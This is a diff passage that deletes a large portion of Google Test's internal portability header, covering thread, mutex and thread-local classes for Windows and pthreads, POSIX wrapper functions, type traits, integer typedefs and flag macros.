-template <typename T>
-class ThreadWithParam : public ThreadWithParamBase {
- public:
-  typedef void UserThreadFunc(T);
-
-  ThreadWithParam(UserThreadFunc* func, T param, Notification* thread_can_start)
-      : func_(func),
-        param_(param),
-        thread_can_start_(thread_can_start),
-        finished_(false) {
-    ThreadWithParamBase* const base = this;
-    // The thread can be created only after all fields except thread_
-    // have been initialized.
-    GTEST_CHECK_POSIX_SUCCESS_(
-        pthread_create(&thread_, 0, &ThreadFuncWithCLinkage, base));
-  }
-  ~ThreadWithParam() { Join(); }
-
-  void Join() {
-    if (!finished_) {
-      GTEST_CHECK_POSIX_SUCCESS_(pthread_join(thread_, 0));
-      finished_ = true;
-    }
-  }
-
-  virtual void Run() {
-    if (thread_can_start_ != NULL)
-      thread_can_start_->WaitForNotification();
-    func_(param_);
-  }
-
- private:
-  UserThreadFunc* const func_;  // User-supplied thread function.
-  const T param_;  // User-supplied parameter to the thread function.
-  // When non-NULL, used to block execution until the controller thread
-  // notifies.
-  Notification* const thread_can_start_;
-  bool finished_;  // true iff we know that the thread function has finished.
-  pthread_t thread_;  // The native thread object.
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadWithParam);
-};
-# endif  // GTEST_HAS_PTHREAD && !GTEST_OS_WINDOWS_MINGW
-
-# if 0  // OS detection
-# elif GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-
-// Mutex implements mutex on Windows platforms.  It is used in conjunction
-// with class MutexLock:
-//
-//   Mutex mutex;
-//   ...
-//   MutexLock lock(&mutex);  // Acquires the mutex and releases it at the
-//                            // end of the current scope.
-//
-// A static Mutex *must* be defined or declared using one of the following
-// macros:
-//   GTEST_DEFINE_STATIC_MUTEX_(g_some_mutex);
-//   GTEST_DECLARE_STATIC_MUTEX_(g_some_mutex);
-//
-// (A non-static Mutex is defined/declared in the usual way).
-class GTEST_API_ Mutex {
- public:
-  enum MutexType { kStatic = 0, kDynamic = 1 };
-  // We rely on kStaticMutex being 0 as it is to what the linker initializes
-  // type_ in static mutexes.  critical_section_ will be initialized lazily
-  // in ThreadSafeLazyInit().
-  enum StaticConstructorSelector { kStaticMutex = 0 };
-
-  // This constructor intentionally does nothing.  It relies on type_ being
-  // statically initialized to 0 (effectively setting it to kStatic) and on
-  // ThreadSafeLazyInit() to lazily initialize the rest of the members.
-  explicit Mutex(StaticConstructorSelector /*dummy*/) {}
-
-  Mutex();
-  ~Mutex();
-
-  void Lock();
-
-  void Unlock();
-
-  // Does nothing if the current thread holds the mutex. Otherwise, crashes
-  // with high probability.
-  void AssertHeld();
-
- private:
-  // Initializes owner_thread_id_ and critical_section_ in static mutexes.
-  void ThreadSafeLazyInit();
-
-  // Per http://blogs.msdn.com/b/oldnewthing/archive/2004/02/23/78395.aspx,
-  // we assume that 0 is an invalid value for thread IDs.
-  unsigned int owner_thread_id_;
-
-  // For static mutexes, we rely on these members being initialized to zeros
-  // by the linker.
-  MutexType type_;
-  long critical_section_init_phase_;  // NOLINT
-  _RTL_CRITICAL_SECTION* critical_section_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Mutex);
-};
-
-# define GTEST_DECLARE_STATIC_MUTEX_(mutex) \
-    extern ::testing::internal::Mutex mutex
-
-# define GTEST_DEFINE_STATIC_MUTEX_(mutex) \
-    ::testing::internal::Mutex mutex(::testing::internal::Mutex::kStaticMutex)
-
-// We cannot name this class MutexLock because the ctor declaration would
-// conflict with a macro named MutexLock, which is defined on some
-// platforms. That macro is used as a defensive measure to prevent against
-// inadvertent misuses of MutexLock like "MutexLock(&mu)" rather than
-// "MutexLock l(&mu)".  Hence the typedef trick below.
-class GTestMutexLock {
- public:
-  explicit GTestMutexLock(Mutex* mutex)
-      : mutex_(mutex) { mutex_->Lock(); }
-
-  ~GTestMutexLock() { mutex_->Unlock(); }
-
- private:
-  Mutex* const mutex_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(GTestMutexLock);
-};
-
-typedef GTestMutexLock MutexLock;
-
-// Base class for ValueHolder<T>.  Allows a caller to hold and delete a value
-// without knowing its type.
-class ThreadLocalValueHolderBase {
- public:
-  virtual ~ThreadLocalValueHolderBase() {}
-};
-
-// Provides a way for a thread to send notifications to a ThreadLocal
-// regardless of its parameter type.
-class ThreadLocalBase {
- public:
-  // Creates a new ValueHolder<T> object holding a default value passed to
-  // this ThreadLocal<T>'s constructor and returns it.  It is the caller's
-  // responsibility not to call this when the ThreadLocal<T> instance already
-  // has a value on the current thread.
-  virtual ThreadLocalValueHolderBase* NewValueForCurrentThread() const = 0;
-
- protected:
-  ThreadLocalBase() {}
-  virtual ~ThreadLocalBase() {}
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadLocalBase);
-};
-
-// Maps a thread to a set of ThreadLocals that have values instantiated on that
-// thread and notifies them when the thread exits.  A ThreadLocal instance is
-// expected to persist until all threads it has values on have terminated.
-class GTEST_API_ ThreadLocalRegistry {
- public:
-  // Registers thread_local_instance as having value on the current thread.
-  // Returns a value that can be used to identify the thread from other threads.
-  static ThreadLocalValueHolderBase* GetValueOnCurrentThread(
-      const ThreadLocalBase* thread_local_instance);
-
-  // Invoked when a ThreadLocal instance is destroyed.
-  static void OnThreadLocalDestroyed(
-      const ThreadLocalBase* thread_local_instance);
-};
-
-class GTEST_API_ ThreadWithParamBase {
- public:
-  void Join();
-
- protected:
-  class Runnable {
-   public:
-    virtual ~Runnable() {}
-    virtual void Run() = 0;
-  };
-
-  ThreadWithParamBase(Runnable *runnable, Notification* thread_can_start);
-  virtual ~ThreadWithParamBase();
-
- private:
-  AutoHandle thread_;
-};
-
-// Helper class for testing Google Test's multi-threading constructs.
-template <typename T>
-class ThreadWithParam : public ThreadWithParamBase {
- public:
-  typedef void UserThreadFunc(T);
-
-  ThreadWithParam(UserThreadFunc* func, T param, Notification* thread_can_start)
-      : ThreadWithParamBase(new RunnableImpl(func, param), thread_can_start) {
-  }
-  virtual ~ThreadWithParam() {}
-
- private:
-  class RunnableImpl : public Runnable {
-   public:
-    RunnableImpl(UserThreadFunc* func, T param)
-        : func_(func),
-          param_(param) {
-    }
-    virtual ~RunnableImpl() {}
-    virtual void Run() {
-      func_(param_);
-    }
-
-   private:
-    UserThreadFunc* const func_;
-    const T param_;
-
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(RunnableImpl);
-  };
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadWithParam);
-};
-
-// Implements thread-local storage on Windows systems.
-//
-//   // Thread 1
-//   ThreadLocal<int> tl(100);  // 100 is the default value for each thread.
-//
-//   // Thread 2
-//   tl.set(150);  // Changes the value for thread 2 only.
-//   EXPECT_EQ(150, tl.get());
-//
-//   // Thread 1
-//   EXPECT_EQ(100, tl.get());  // In thread 1, tl has the original value.
-//   tl.set(200);
-//   EXPECT_EQ(200, tl.get());
-//
-// The template type argument T must have a public copy constructor.
-// In addition, the default ThreadLocal constructor requires T to have
-// a public default constructor.
-//
-// The users of a TheadLocal instance have to make sure that all but one
-// threads (including the main one) using that instance have exited before
-// destroying it. Otherwise, the per-thread objects managed for them by the
-// ThreadLocal instance are not guaranteed to be destroyed on all platforms.
-//
-// Google Test only uses global ThreadLocal objects.  That means they
-// will die after main() has returned.  Therefore, no per-thread
-// object managed by Google Test will be leaked as long as all threads
-// using Google Test have exited when main() returns.
-template <typename T>
-class ThreadLocal : public ThreadLocalBase {
- public:
-  ThreadLocal() : default_() {}
-  explicit ThreadLocal(const T& value) : default_(value) {}
-
-  ~ThreadLocal() { ThreadLocalRegistry::OnThreadLocalDestroyed(this); }
-
-  T* pointer() { return GetOrCreateValue(); }
-  const T* pointer() const { return GetOrCreateValue(); }
-  const T& get() const { return *pointer(); }
-  void set(const T& value) { *pointer() = value; }
-
- private:
-  // Holds a value of T.  Can be deleted via its base class without the caller
-  // knowing the type of T.
-  class ValueHolder : public ThreadLocalValueHolderBase {
-   public:
-    explicit ValueHolder(const T& value) : value_(value) {}
-
-    T* pointer() { return &value_; }
-
-   private:
-    T value_;
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(ValueHolder);
-  };
-
-
-  T* GetOrCreateValue() const {
-    return static_cast<ValueHolder*>(
-        ThreadLocalRegistry::GetValueOnCurrentThread(this))->pointer();
-  }
-
-  virtual ThreadLocalValueHolderBase* NewValueForCurrentThread() const {
-    return new ValueHolder(default_);
-  }
-
-  const T default_;  // The default value for each thread.
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadLocal);
-};
-
-# elif GTEST_HAS_PTHREAD
-
-// MutexBase and Mutex implement mutex on pthreads-based platforms.
-class MutexBase {
- public:
-  // Acquires this mutex.
-  void Lock() {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_lock(&mutex_));
-    owner_ = pthread_self();
-    has_owner_ = true;
-  }
-
-  // Releases this mutex.
-  void Unlock() {
-    // Since the lock is being released the owner_ field should no longer be
-    // considered valid. We don't protect writing to has_owner_ here, as it's
-    // the caller's responsibility to ensure that the current thread holds the
-    // mutex when this is called.
-    has_owner_ = false;
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_unlock(&mutex_));
-  }
-
-  // Does nothing if the current thread holds the mutex. Otherwise, crashes
-  // with high probability.
-  void AssertHeld() const {
-    GTEST_CHECK_(has_owner_ && pthread_equal(owner_, pthread_self()))
-        << "The current thread is not holding the mutex @" << this;
-  }
-
-  // A static mutex may be used before main() is entered.  It may even
-  // be used before the dynamic initialization stage.  Therefore we
-  // must be able to initialize a static mutex object at link time.
-  // This means MutexBase has to be a POD and its member variables
-  // have to be public.
- public:
-  pthread_mutex_t mutex_;  // The underlying pthread mutex.
-  // has_owner_ indicates whether the owner_ field below contains a valid thread
-  // ID and is therefore safe to inspect (e.g., to use in pthread_equal()). All
-  // accesses to the owner_ field should be protected by a check of this field.
-  // An alternative might be to memset() owner_ to all zeros, but there's no
-  // guarantee that a zero'd pthread_t is necessarily invalid or even different
-  // from pthread_self().
-  bool has_owner_;
-  pthread_t owner_;  // The thread holding the mutex.
-};
-
-// Forward-declares a static mutex.
-#  define GTEST_DECLARE_STATIC_MUTEX_(mutex) \
-     extern ::testing::internal::MutexBase mutex
-
-// Defines and statically (i.e. at link time) initializes a static mutex.
-// The initialization list here does not explicitly initialize each field,
-// instead relying on default initialization for the unspecified fields. In
-// particular, the owner_ field (a pthread_t) is not explicitly initialized.
-// This allows initialization to work whether pthread_t is a scalar or struct.
-// The flag -Wmissing-field-initializers must not be specified for this to work.
-#  define GTEST_DEFINE_STATIC_MUTEX_(mutex) \
-     ::testing::internal::MutexBase mutex = { PTHREAD_MUTEX_INITIALIZER, false }
-
-// The Mutex class can only be used for mutexes created at runtime. It
-// shares its API with MutexBase otherwise.
-class Mutex : public MutexBase {
- public:
-  Mutex() {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_init(&mutex_, NULL));
-    has_owner_ = false;
-  }
-  ~Mutex() {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_destroy(&mutex_));
-  }
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Mutex);
-};
-
-// We cannot name this class MutexLock because the ctor declaration would
-// conflict with a macro named MutexLock, which is defined on some
-// platforms. That macro is used as a defensive measure to prevent against
-// inadvertent misuses of MutexLock like "MutexLock(&mu)" rather than
-// "MutexLock l(&mu)".  Hence the typedef trick below.
-class GTestMutexLock {
- public:
-  explicit GTestMutexLock(MutexBase* mutex)
-      : mutex_(mutex) { mutex_->Lock(); }
-
-  ~GTestMutexLock() { mutex_->Unlock(); }
-
- private:
-  MutexBase* const mutex_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(GTestMutexLock);
-};
-
-typedef GTestMutexLock MutexLock;
-
-// Helpers for ThreadLocal.
-
-// pthread_key_create() requires DeleteThreadLocalValue() to have
-// C-linkage.  Therefore it cannot be templatized to access
-// ThreadLocal<T>.  Hence the need for class
-// ThreadLocalValueHolderBase.
-class ThreadLocalValueHolderBase {
- public:
-  virtual ~ThreadLocalValueHolderBase() {}
-};
-
-// Called by pthread to delete thread-local data stored by
-// pthread_setspecific().
-extern "C" inline void DeleteThreadLocalValue(void* value_holder) {
-  delete static_cast<ThreadLocalValueHolderBase*>(value_holder);
-}
-
-// Implements thread-local storage on pthreads-based systems.
-template <typename T>
-class ThreadLocal {
- public:
-  ThreadLocal() : key_(CreateKey()),
-                  default_() {}
-  explicit ThreadLocal(const T& value) : key_(CreateKey()),
-                                         default_(value) {}
-
-  ~ThreadLocal() {
-    // Destroys the managed object for the current thread, if any.
-    DeleteThreadLocalValue(pthread_getspecific(key_));
-
-    // Releases resources associated with the key.  This will *not*
-    // delete managed objects for other threads.
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_key_delete(key_));
-  }
-
-  T* pointer() { return GetOrCreateValue(); }
-  const T* pointer() const { return GetOrCreateValue(); }
-  const T& get() const { return *pointer(); }
-  void set(const T& value) { *pointer() = value; }
-
- private:
-  // Holds a value of type T.
-  class ValueHolder : public ThreadLocalValueHolderBase {
-   public:
-    explicit ValueHolder(const T& value) : value_(value) {}
-
-    T* pointer() { return &value_; }
-
-   private:
-    T value_;
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(ValueHolder);
-  };
-
-  static pthread_key_t CreateKey() {
-    pthread_key_t key;
-    // When a thread exits, DeleteThreadLocalValue() will be called on
-    // the object managed for that thread.
-    GTEST_CHECK_POSIX_SUCCESS_(
-        pthread_key_create(&key, &DeleteThreadLocalValue));
-    return key;
-  }
-
-  T* GetOrCreateValue() const {
-    ThreadLocalValueHolderBase* const holder =
-        static_cast<ThreadLocalValueHolderBase*>(pthread_getspecific(key_));
-    if (holder != NULL) {
-      return CheckedDowncastToActualType<ValueHolder>(holder)->pointer();
-    }
-
-    ValueHolder* const new_holder = new ValueHolder(default_);
-    ThreadLocalValueHolderBase* const holder_base = new_holder;
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_setspecific(key_, holder_base));
-    return new_holder->pointer();
-  }
-
-  // A key pthreads uses for looking up per-thread values.
-  const pthread_key_t key_;
-  const T default_;  // The default value for each thread.
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadLocal);
-};
-
-# endif  // OS detection
-
-#else  // GTEST_IS_THREADSAFE
-
-// A dummy implementation of synchronization primitives (mutex, lock,
-// and thread-local variable).  Necessary for compiling Google Test where
-// mutex is not supported - using Google Test in multiple threads is not
-// supported on such platforms.
-
-class Mutex {
- public:
-  Mutex() {}
-  void Lock() {}
-  void Unlock() {}
-  void AssertHeld() const {}
-};
-
-# define GTEST_DECLARE_STATIC_MUTEX_(mutex) \
-  extern ::testing::internal::Mutex mutex
-
-# define GTEST_DEFINE_STATIC_MUTEX_(mutex) ::testing::internal::Mutex mutex
-
-// We cannot name this class MutexLock because the ctor declaration would
-// conflict with a macro named MutexLock, which is defined on some
-// platforms. That macro is used as a defensive measure to prevent against
-// inadvertent misuses of MutexLock like "MutexLock(&mu)" rather than
-// "MutexLock l(&mu)".  Hence the typedef trick below.
-class GTestMutexLock {
- public:
-  explicit GTestMutexLock(Mutex*) {}  // NOLINT
-};
-
-typedef GTestMutexLock MutexLock;
-
-template <typename T>
-class ThreadLocal {
- public:
-  ThreadLocal() : value_() {}
-  explicit ThreadLocal(const T& value) : value_(value) {}
-  T* pointer() { return &value_; }
-  const T* pointer() const { return &value_; }
-  const T& get() const { return value_; }
-  void set(const T& value) { value_ = value; }
- private:
-  T value_;
-};
-
-#endif  // GTEST_IS_THREADSAFE
-
-// Returns the number of threads running in the process, or 0 to indicate that
-// we cannot detect it.
-GTEST_API_ size_t GetThreadCount();
-
-// Passing non-POD classes through ellipsis (...) crashes the ARM
-// compiler and generates a warning in Sun Studio.  The Nokia Symbian
-// and the IBM XL C/C++ compiler try to instantiate a copy constructor
-// for objects passed through ellipsis (...), failing for uncopyable
-// objects.  We define this to ensure that only POD is passed through
-// ellipsis on these systems.
-#if defined(__SYMBIAN32__) || defined(__IBMCPP__) || defined(__SUNPRO_CC)
-// We lose support for NULL detection where the compiler doesn't like
-// passing non-POD classes through ellipsis (...).
-# define GTEST_ELLIPSIS_NEEDS_POD_ 1
-#else
-# define GTEST_CAN_COMPARE_NULL 1
-#endif
-
-// The Nokia Symbian and IBM XL C/C++ compilers cannot decide between
-// const T& and const T* in a function template.  These compilers
-// _can_ decide between class template specializations for T and T*,
-// so a tr1::type_traits-like is_pointer works.
-#if defined(__SYMBIAN32__) || defined(__IBMCPP__)
-# define GTEST_NEEDS_IS_POINTER_ 1
-#endif
-
-template <bool bool_value>
-struct bool_constant {
-  typedef bool_constant<bool_value> type;
-  static const bool value = bool_value;
-};
-template <bool bool_value> const bool bool_constant<bool_value>::value;
-
-typedef bool_constant<false> false_type;
-typedef bool_constant<true> true_type;
-
-template <typename T>
-struct is_pointer : public false_type {};
-
-template <typename T>
-struct is_pointer<T*> : public true_type {};
-
-template <typename Iterator>
-struct IteratorTraits {
-  typedef typename Iterator::value_type value_type;
-};
-
-template <typename T>
-struct IteratorTraits<T*> {
-  typedef T value_type;
-};
-
-template <typename T>
-struct IteratorTraits<const T*> {
-  typedef T value_type;
-};
-
-#if GTEST_OS_WINDOWS
-# define GTEST_PATH_SEP_ "\\"
-# define GTEST_HAS_ALT_PATH_SEP_ 1
-// The biggest signed integer type the compiler supports.
-typedef __int64 BiggestInt;
-#else
-# define GTEST_PATH_SEP_ "/"
-# define GTEST_HAS_ALT_PATH_SEP_ 0
-typedef long long BiggestInt;  // NOLINT
-#endif  // GTEST_OS_WINDOWS
-
-// Utilities for char.
-
-// isspace(int ch) and friends accept an unsigned char or EOF.  char
-// may be signed, depending on the compiler (or compiler flags).
-// Therefore we need to cast a char to unsigned char before calling
-// isspace(), etc.
-
-inline bool IsAlpha(char ch) {
-  return isalpha(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsAlNum(char ch) {
-  return isalnum(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsDigit(char ch) {
-  return isdigit(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsLower(char ch) {
-  return islower(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsSpace(char ch) {
-  return isspace(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsUpper(char ch) {
-  return isupper(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsXDigit(char ch) {
-  return isxdigit(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsXDigit(wchar_t ch) {
-  const unsigned char low_byte = static_cast<unsigned char>(ch);
-  return ch == low_byte && isxdigit(low_byte) != 0;
-}
-
-inline char ToLower(char ch) {
-  return static_cast<char>(tolower(static_cast<unsigned char>(ch)));
-}
-inline char ToUpper(char ch) {
-  return static_cast<char>(toupper(static_cast<unsigned char>(ch)));
-}
-
-inline std::string StripTrailingSpaces(std::string str) {
-  std::string::iterator it = str.end();
-  while (it != str.begin() && IsSpace(*--it))
-    it = str.erase(it);
-  return str;
-}
-
-// The testing::internal::posix namespace holds wrappers for common
-// POSIX functions.  These wrappers hide the differences between
-// Windows/MSVC and POSIX systems.  Since some compilers define these
-// standard functions as macros, the wrapper cannot have the same name
-// as the wrapped function.
-
-namespace posix {
-
-// Functions with a different name on Windows.
-
-#if GTEST_OS_WINDOWS
-
-typedef struct _stat StatStruct;
-
-# ifdef __BORLANDC__
-inline int IsATTY(int fd) { return isatty(fd); }
-inline int StrCaseCmp(const char* s1, const char* s2) {
-  return stricmp(s1, s2);
-}
-inline char* StrDup(const char* src) { return strdup(src); }
-# else  // !__BORLANDC__
-#  if GTEST_OS_WINDOWS_MOBILE
-inline int IsATTY(int /* fd */) { return 0; }
-#  else
-inline int IsATTY(int fd) { return _isatty(fd); }
-#  endif  // GTEST_OS_WINDOWS_MOBILE
-inline int StrCaseCmp(const char* s1, const char* s2) {
-  return _stricmp(s1, s2);
-}
-inline char* StrDup(const char* src) { return _strdup(src); }
-# endif  // __BORLANDC__
-
-# if GTEST_OS_WINDOWS_MOBILE
-inline int FileNo(FILE* file) { return reinterpret_cast<int>(_fileno(file)); }
-// Stat(), RmDir(), and IsDir() are not needed on Windows CE at this
-// time and thus not defined there.
-# else
-inline int FileNo(FILE* file) { return _fileno(file); }
-inline int Stat(const char* path, StatStruct* buf) { return _stat(path, buf); }
-inline int RmDir(const char* dir) { return _rmdir(dir); }
-inline bool IsDir(const StatStruct& st) {
-  return (_S_IFDIR & st.st_mode) != 0;
-}
-# endif  // GTEST_OS_WINDOWS_MOBILE
-
-#else
-
-typedef struct stat StatStruct;
-
-inline int FileNo(FILE* file) { return fileno(file); }
-inline int IsATTY(int fd) { return isatty(fd); }
-inline int Stat(const char* path, StatStruct* buf) { return stat(path, buf); }
-inline int StrCaseCmp(const char* s1, const char* s2) {
-  return strcasecmp(s1, s2);
-}
-inline char* StrDup(const char* src) { return strdup(src); }
-inline int RmDir(const char* dir) { return rmdir(dir); }
-inline bool IsDir(const StatStruct& st) { return S_ISDIR(st.st_mode); }
-
-#endif  // GTEST_OS_WINDOWS
-
-// Functions deprecated by MSVC 8.0.
-
-GTEST_DISABLE_MSC_WARNINGS_PUSH_(4996 /* deprecated function */)
-
-inline const char* StrNCpy(char* dest, const char* src, size_t n) {
-  return strncpy(dest, src, n);
-}
-
-// ChDir(), FReopen(), FDOpen(), Read(), Write(), Close(), and
-// StrError() aren't needed on Windows CE at this time and thus not
-// defined there.
-
-#if !GTEST_OS_WINDOWS_MOBILE && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-inline int ChDir(const char* dir) { return chdir(dir); }
-#endif
-inline FILE* FOpen(const char* path, const char* mode) {
-  return fopen(path, mode);
-}
-#if !GTEST_OS_WINDOWS_MOBILE
-inline FILE *FReopen(const char* path, const char* mode, FILE* stream) {
-  return freopen(path, mode, stream);
-}
-inline FILE* FDOpen(int fd, const char* mode) { return fdopen(fd, mode); }
-#endif
-inline int FClose(FILE* fp) { return fclose(fp); }
-#if !GTEST_OS_WINDOWS_MOBILE
-inline int Read(int fd, void* buf, unsigned int count) {
-  return static_cast<int>(read(fd, buf, count));
-}
-inline int Write(int fd, const void* buf, unsigned int count) {
-  return static_cast<int>(write(fd, buf, count));
-}
-inline int Close(int fd) { return close(fd); }
-inline const char* StrError(int errnum) { return strerror(errnum); }
-#endif
-inline const char* GetEnv(const char* name) {
-#if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_WINDOWS_PHONE | GTEST_OS_WINDOWS_RT
-  // We are on Windows CE, which has no environment variables.
-  static_cast<void>(name);  // To prevent 'unused argument' warning.
-  return NULL;
-#elif defined(__BORLANDC__) || defined(__SunOS_5_8) || defined(__SunOS_5_9)
-  // Environment variables which we programmatically clear will be set to the
-  // empty string rather than unset (NULL).  Handle that case.
-  const char* const env = getenv(name);
-  return (env != NULL && env[0] != '\0') ? env : NULL;
-#else
-  return getenv(name);
-#endif
-}
-
-GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-#if GTEST_OS_WINDOWS_MOBILE
-// Windows CE has no C library. The abort() function is used in
-// several places in Google Test. This implementation provides a reasonable
-// imitation of standard behaviour.
-void Abort();
-#else
-inline void Abort() { abort(); }
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-}  // namespace posix
-
-// MSVC "deprecates" snprintf and issues warnings wherever it is used.  In
-// order to avoid these warnings, we need to use _snprintf or _snprintf_s on
-// MSVC-based platforms.  We map the GTEST_SNPRINTF_ macro to the appropriate
-// function in order to achieve that.  We use macro definition here because
-// snprintf is a variadic function.
-#if _MSC_VER >= 1400 && !GTEST_OS_WINDOWS_MOBILE
-// MSVC 2005 and above support variadic macros.
-# define GTEST_SNPRINTF_(buffer, size, format, ...) \
-     _snprintf_s(buffer, size, size, format, __VA_ARGS__)
-#elif defined(_MSC_VER)
-// Windows CE does not define _snprintf_s and MSVC prior to 2005 doesn't
-// complain about _snprintf.
-# define GTEST_SNPRINTF_ _snprintf
-#else
-# define GTEST_SNPRINTF_ snprintf
-#endif
-
-// The maximum number a BiggestInt can represent.  This definition
-// works no matter BiggestInt is represented in one's complement or
-// two's complement.
-//
-// We cannot rely on numeric_limits in STL, as __int64 and long long
-// are not part of standard C++ and numeric_limits doesn't need to be
-// defined for them.
-const BiggestInt kMaxBiggestInt =
-    ~(static_cast<BiggestInt>(1) << (8*sizeof(BiggestInt) - 1));
-
-// This template class serves as a compile-time function from size to
-// type.  It maps a size in bytes to a primitive type with that
-// size. e.g.
-//
-//   TypeWithSize<4>::UInt
-//
-// is typedef-ed to be unsigned int (unsigned integer made up of 4
-// bytes).
-//
-// Such functionality should belong to STL, but I cannot find it
-// there.
-//
-// Google Test uses this class in the implementation of floating-point
-// comparison.
-//
-// For now it only handles UInt (unsigned int) as that's all Google Test
-// needs.  Other types can be easily added in the future if need
-// arises.
-template <size_t size>
-class TypeWithSize {
- public:
-  // This prevents the user from using TypeWithSize<N> with incorrect
-  // values of N.
-  typedef void UInt;
-};
-
-// The specialization for size 4.
-template <>
-class TypeWithSize<4> {
- public:
-  // unsigned int has size 4 in both gcc and MSVC.
-  //
-  // As base/basictypes.h doesn't compile on Windows, we cannot use
-  // uint32, uint64, and etc here.
-  typedef int Int;
-  typedef unsigned int UInt;
-};
-
-// The specialization for size 8.
-template <>
-class TypeWithSize<8> {
- public:
-#if GTEST_OS_WINDOWS
-  typedef __int64 Int;
-  typedef unsigned __int64 UInt;
-#else
-  typedef long long Int;  // NOLINT
-  typedef unsigned long long UInt;  // NOLINT
-#endif  // GTEST_OS_WINDOWS
-};
-
-// Integer types of known sizes.
-typedef TypeWithSize<4>::Int Int32;
-typedef TypeWithSize<4>::UInt UInt32;
-typedef TypeWithSize<8>::Int Int64;
-typedef TypeWithSize<8>::UInt UInt64;
-typedef TypeWithSize<8>::Int TimeInMillis;  // Represents time in milliseconds.
-
-// Utilities for command line flags and environment variables.
-
-// Macro for referencing flags.
-#define GTEST_FLAG(name) FLAGS_gtest_##name
-
-// Macros for declaring flags.
-#define GTEST_DECLARE_bool_(name) GTEST_API_ extern bool GTEST_FLAG(name)
-#define GTEST_DECLARE_int32_(name) \
-    GTEST_API_ extern ::testing::internal::Int32 GTEST_FLAG(name)
-#define GTEST_DECLARE_string_(name) \
-    GTEST_API_ extern ::std::string GTEST_FLAG(name)
-
-// Macros for defining flags.
-#define GTEST_DEFINE_bool_(name, default_val, doc) \
-    GTEST_API_ bool GTEST_FLAG(name) = (default_val)
-#define GTEST_DEFINE_int32_(name, default_val, doc) \
-    GTEST_API_ ::testing::internal::Int32 GTEST_FLAG(name) = (default_val)
-#define GTEST_DEFINE_string_(name, default_val, doc) \
-    GTEST_API_ ::std::string GTEST_FLAG(name) = (default_val)
-
-// Thread annotations
-#define GTEST_EXCLUSIVE_LOCK_REQUIRED_(locks)
-#define GTEST_LOCK_EXCLUDED_(locks)
-
-// Parses 'str' for a 32-bit signed integer.  If successful, writes the result
-// to *value and returns true; otherwise leaves *value unchanged and returns
-// false.
-// TODO(chandlerc): Find a better way to refactor flag and environment parsing
-// out of both gtest-port.cc and gtest.cc to avoid exporting this utility
-// function.
-bool ParseInt32(const Message& src_text, const char* str, Int32* value);
-
-// Parses a bool/Int32/string from the environment variable
-// corresponding to the given Google Test flag.
-bool BoolFromGTestEnv(const char* flag, bool default_val);
-GTEST_API_ Int32 Int32FromGTestEnv(const char* flag, Int32 default_val);
-const char* StringFromGTestEnv(const char* flag, const char* default_val);
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PORT_H_
-
-
-#if GTEST_OS_LINUX
-# include <stdlib.h>
-# include <sys/types.h>
-# include <sys/wait.h>
-# include <unistd.h>
-#endif  // GTEST_OS_LINUX
-
-#if GTEST_HAS_EXCEPTIONS
-# include <stdexcept>
-#endif
-
-#include <ctype.h>
-#include <float.h>
-#include <string.h>
-#include <iomanip>
-#include <limits>
-#include <set>
-#include <string>
-#include <vector>
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
